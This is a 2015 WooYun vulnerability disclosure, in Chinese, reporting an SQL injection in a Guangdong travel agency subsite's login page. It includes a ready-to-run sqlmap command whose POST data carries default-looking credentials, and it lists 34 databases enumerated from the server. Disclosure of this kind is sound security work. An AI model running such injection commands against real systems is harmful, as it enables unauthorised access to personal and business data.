当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149020

漏洞标题:南湖国旅某分站sql注入涉及大量敏感数据

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-24 09:13

修复时间:2015-12-12 14:46

公开时间:2015-12-12 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

广东南湖国际旅行社有限责任公司于1999年成功转制为股份制民营企业,是一家集旅行社、航空服务公司、旅游风景区、度假村、酒店、车队等为一体的大型综合旅游集团。

详细说明:

注入位置是 **.**.**.**

http://**.**.**.**/Default.aspx


sqlmap.py -u "http://**.**.**.**/Default.aspx" --data "__VIEWSTATE=/wEPDwUKMTgxNDg1MzgwMWRk9g2dOtptg0hBGdpvmmqBUDZ9W48%3D&__EVENTVALIDATION=/wEWBQKb4LTUBgLepJP5CALGmdGVDAKM54rGBgK7q7GGCG0QNxWb1UGgcePTwvGfISXJH7bP&carno=admin&pwd=111111&Button1=%E7%99%BB  %E9%99%86" --dbs


涉及30多个库:

available databases [34]:
[*] attend2015
[*] datahouse
[*] gdzc
[*] gzldb
[*] hitcard
[*] hkm_member
[*] hoteldb
[*] imagedb
[*] js
[*] kaoqing
[*] localbbs
[*] market
[*] master
[*] member
[*] model
[*] msdb
[*] newticket
[*] ouguan
[*] PassScan
[*] receipt
[*] ReportServer
[*] ReportServerTempDB
[*] smart_all
[*] smartproductdb
[*] smarttraveldb
[*] sndb
[*] SPAC
[*] SSdb
[*] STAC
[*] STImageDB
[*] TelManage
[*] tempdb
[*] tr_log
[*] ZjwData


漏洞证明:

34个数据库.png


当前库1700多个表 数据量巨大

主库1700个表.png

修复方案:

过滤参数 求20rank

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-28 14:45

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无